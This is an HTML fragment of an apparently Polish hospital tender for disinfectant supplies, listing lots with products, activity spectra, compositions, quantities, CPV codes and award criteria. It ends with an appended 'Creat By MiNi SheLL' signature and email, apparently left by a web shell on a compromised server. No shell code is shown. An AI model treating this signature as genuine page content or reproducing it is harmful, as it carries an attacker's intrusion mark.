2.4 Preparat w postaci pianki do dezynfekcji sprzętu i aparatury medycznej wrażliwych na działanie alkoholi<br>
- preparat bez aldehydów, chloru i pochodnych fenolowych,<br>
- spektrum działania - B, F, V, Tbc - 5 min.<br>
Butelka ze spryskiwaczem do 750 ml.<br>
2.5 Środek myjąco-dezynfekujący w postaci żelu do czyszczenia odsysaczy i ślinociągów stomatologicznych, w opakowaniu 1000 ml  z dozownikiem. Środek na bazie glukoprotaminy. Czas działania min. 15 min. <br>
- spektrum działania B, F, V (HBV, HIV)<br>
2.5.1 Opakowania 1l z dozownikiem<br>
2.5.2 Opakowania 5l<br>

2.6 Preparat do dezynfekcji lodówek z żywnością. Gotowy do użycia, bezbarwny preparat do szybkiej dezynfekcji małych powierzchni odpornych na działanie alkoholi.
Opakowanie 0,75 l ze spryskiwaczem . Aktywny wobec bakterii i grzybów.
Czas ekspozycji 5 min
Skład :<br>
alkohol izopropylowy  35 - 50 %<br>
alkohol propylowy         20 - 25 %<br>
pH - 7.5 do 8.5 (100%)<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - dostawa preparatów do dezynfekcji powierzchni i sprzętu medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1.Preparat do dezynfekcji małych powierzchni trudnodostępnych ze spryskiwaczem
(maksymalna. wielkość pojemnika 1 litr) - 1060 l<br>
3.2. Preparat na bazie QAV do mycia i dezynfekcji powierzchni i sprzętu medycznego
(maksymalna. wielkość pojemnika 5  litr - 30 000 l
<br><br>
WIELKOŚĆ, STRUKTURA ZAMÓWIENIA I WYMOGI
 TECHNICZNO-UŻYTKOWE DLA OFEROWANYCH ŚRODKÓW DEZYNFEKCYJNYCH - Zadanie Nr 3
3.1 Preparat gotowy do użycia, do dezynfekcji powierzchni trudnodostępnych (alkohole) bez aldehydów i chlorhexydyny
- spektrum działania - B, F, V (Vakcinia, Adeno), Tbc M. Tuberculosis) 5 min.
- B, F, Rota - 1 min. 
3.2 Preparat na bazie QAV do mycia i dezynfekcji powierzchni i sprzętu medycznego. Nie zawierający związków tlenowych, aldehydów, fenoli i chloru.
- spektrum B, F, Tbc (M. tuberculosis), V (HCV, HBV, Rota, Papowa, Vakcinia)
- max czas działania 15 min<br><br>

* Zamawiający dopuszcza możliwość oddzielnej wyceny preparatu i spryskiwacza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 - dostawa preparatów do dezynfekcji inkubatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do dezynfekcji inkubatorów (maksymalna wielkość pojemnika 
10 kg) - 5.000 l<br><br>
WIELKOŚĆ, STRUKTURA ZAMÓWIENIA I WYMOGI
 TECHNICZNO-UŻYTKOWE DLA OFEROWANYCH ŚRODKÓW DEZYNFEKCYJNYCH - Zadanie Nr 4
<br>
- spektrum działania - B, F (A.Niger), V (Polio, Adeno), Tbc<br>
- na bazie  aktywnego tlenu<br>
- max czas 0,5 h.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5 - dostawa chusteczek do dezynfekcji drobnego sprzętu medycznego i powierzchni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 5.1. Preparat do dezynfekcji powierzchni - chusteczki nasączone alkoholem (max opakowanie 90 szt. chusteczek) - 18.000 szt. chusteczek<br>
5.2. Preparat do dezynfekcji powierzchni - chusteczki nasączone płynem dezynfekcyjnym na bazie QAV (max opakowanie 250 szt. chusteczek) - 146.700 sztuk
<br>
WIELKOŚĆ, STRUKTURA ZAMÓWIENIA I WYMOGI TECHNICZNO-UŻYTKOWE DLA OFEROWANYCH ŚRODKÓW DEZYNFEKCYJNYCH - Zadanie Nr 5
<br>
5.1 Chusteczki nasączone alkoholem (max 60%) bez QAV, do dezynfekcji drobnego sprzętu np. słuchawki lekarskie itp. <br>
- min. wymiary: 14x22 cm<br>
- spektrum działania: <br>
B, F, V (Rota) - 1 min.<br>
B, F, Tbc, V(HIV, HBV, Vakzinia, Adeno) - 5 min.<br>
Opakowanie: sztywny pojemnik umożliwiający pobieranie pojedynczych chusteczek
<br>
5.2. Bezalkoholowe chusteczki z włókniny wiskozowej nasączone płynem dezynfekcyjnym na bazie QAV do dezynfekcji głowic USG oraz małych powierzchni skuteczne wobec wirusów polio, adeno i rota.<br>
- min. wymiary: 24 x 30 cm<br>
- spektrum działania: <br>
B, F, V (HIV, HBV, HCV) - 1 min.<br>
B, F(A. niger), Tbc, V (Noro) - 15 min.<br>
Opakowanie: sztywny pojemnik umożliwiający pobieranie pojedynczych chusteczek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6 - dostawa preparatów do mycia, dezynfekcji i pielęgnacji rąk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.1.1. Preparat do dezynfekcji rąk (max wielkość 0,5 litra) - 780 l<br>
6.1.2. Preparat do dezynfekcji rąk (max wielkość 5 litrów) -1550 l<br>
6.2.1. Płyn do mycia chirurgicznego i higienicznego rąk (max wielkość 0,5 litrów) - 400 l<br>
6.2.2. Płyn do mycia chirurgicznego i higienicznego rąk (max wielkość 6 litrów) - 400 l<br>
6.3. Emulsja do pielęgnacji rąk (max wielkość 0,5 litra) - 250 l<br><br>
WIELKOŚĆ, STRUKTURA ZAMÓWIENIA I WYMOGI TECHNICZNO-UŻYTKOWE DLA OFEROWANYCH ŚRODKÓW DEZYNFEKCYJNYCH - Zadanie Nr 6<br>

6.1 Dezynfekcja rąk
        Preparat na bazie co najmniej trzech    
        substancji czynnych z różnych grup  
        chemicznych, bez chlorheksydyny  i  
         pochodnych fenolowych.
        - spektrum działania - B, F, V(HIV, HBV,  
           HSV, Rota), Tbc
        - pH 5-5,5 
6.1.1 Preparat w pojemnikach do 0,5l
6.1.2 Preparat w pojemnikach do 5l
6.2 Płyn do mycia chirurgicznego
        i higienicznego rąk niezawierający mydła, 
        pH 5- 5,5  
6.2.1 Preparat w pojemnikach do 0,5l
6.2.2 Preparat w pojemnikach do 6l

6.3 Emulsja do pielęgnacji rąk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie Nr 7 - dostawa preparatów do dezynfekcji i mycia rąk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 7.1 Preparat do chirurgicznej i higienicznej dezynfekcji rąk (max wielkość 0,7 litra) - 900 l<br>
7.2 Preparat do chirurgicznego i higienicznego mycia rąk (max wielkość 0,7 litra) - 315 l<br>
7.3 Krem nawilżający do systemu sterisol max wielkość 0,7 litra) - 30 l<br><br>
WIELKOŚĆ, STRUKTURA ZAMÓWIENIA I WYMOGI TECHNICZNO-UŻYTKOWE DLA OFEROWANYCH ŚRODKÓW DEZYNFEKCYJNYCH - Zadanie Nr 7
<br>
7.1 Preparat do chirurgicznej i higienicznej dezynfekcji rąk<br>
- opakowania dostosowane do systemu Sterisol<br>
7.2 Preparat do higienicznego i chirurgicznego mycia rąk oraz do mycia i pielęgnacji ciała pacjenta<br>
-opakowania dostosowane do systemu Sterisol<br>
7.3. Krem nawilżający do systemu Sterisol.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie Nr 8 - dostawa preparatów do dezynfekcji maszynowej basenów i kaczek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 8.1 Preparat do dezynfekcji maszynowej basenów i kaczek
(max wielkość  5 litrów) - 400 l<br>
8.2 Enzymatyczny preparat do mycia basenów i kaczek (max wielkość 5 litrów) - 40 l<br>

WIELKOŚĆ, STRUKTURA ZAMÓWIENIA I WYMOGI TECHNICZNO-UŻYTKOWE DLA OFEROWANYCH ŚRODKÓW DEZYNFEKCYJNYCH - Zadanie Nr 8<br>

8.1 Preparat do maszynowego mycia i płukania basenów szpitalnych i kaczek zawierający w składzie niejonowe zw. powierzchniowo-czynne , inhibitory korozji i kwasy organiczne. O właściwościach odkamieniających (pH 2).
Dozowanie 0,5ml/l na każde 5 st.twardości wody.<br>
8.2 Enzymatyczny preparat do mycia basenów i kaczek pH 5,5-7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie Nr 9 - dostawa preparatów do dezynfekcji unitów stomatologicznych XO4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 9. Preparat na bazie QAV myjąco-dezynfekujący dostosowany do unitu (automatyczny pobór preparatu) (max wielkość 1 litr) - 6 l
<br>
WIELKOŚĆ, STRUKTURA ZAMÓWIENIA I WYMOGI TECHNICZNO-UŻYTKOWE DLA OFEROWANYCH ŚRODKÓW DEZYNFEKCYJNYCH - Zadanie Nr 9<br><br>

Preparat na bazie QAV myjąco - dezynfekujący dostosowany do unitu (automatyczny pobór preparatu)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com